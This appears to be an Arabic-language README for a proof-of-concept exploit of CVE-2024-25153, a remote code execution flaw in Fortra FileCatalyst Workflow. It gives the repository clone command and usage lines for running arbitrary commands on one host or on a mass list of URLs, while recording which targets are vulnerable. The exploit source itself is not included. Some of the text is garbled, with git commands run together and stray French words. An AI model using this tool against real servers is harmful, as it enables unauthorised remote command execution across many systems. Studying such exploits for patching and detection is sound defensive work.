
استغلال إثبات المفهوم لثغرة CVE-2024-25153.

مرحبًا بك في استغلال CVE-2024-25153! هذا المشروع هو حل لاستغلال الثغرة الأمنية CVE-2024-25153 وتنفيذ التعليمات البرمجية عن بُعد في Fortra FileCatalyst Workflow.
إليك كيفية تثبيت استغلال CVE-2024-25153 على جهازك:
git clone https://github.com/tucommenceapousser/CVE-2024-25153.git
cd CVE-2024-25153
وضع Host:
لاستغلال الثغرة الأمنية CVE-2024-25153 على مضيف واحد، استخدم الأمر التالي:
python main.py --host {hostname} --port {port} --url {url} --cmd {command}
وضع Mass:
إذا كانت لديك قائمة بعدة عناوين URL لاختبارها، يمكنك استخدام وضع "mass". تأكد من وجود ملف .txt يحتوي على قائمة عناوين URL، واحد في كل سطر. استخدم الأمر التالي لتشغيل وضع "mass" وحفظ النتائج في ملف .txt:
python main.py --mass {chemin_vers_fichier_urls} --port {port} --url {url} --cmd {command}
سيتم حفظ النتائج الضعيفة في ملف .txt يحدده المستخدم.
إذا كنت ترغب في المساهمة في استغلال CVE-2024-25153، فاتبع هذه الخطوات:
git checkout -b ameliorations)git commit -am 'Ajouter de nouvelles fonctionnalités')git push origin ameliorations)هذا المشروع مرخص بموجب MIT. لمزيد من المعلومات، راجع ملف LICENSE.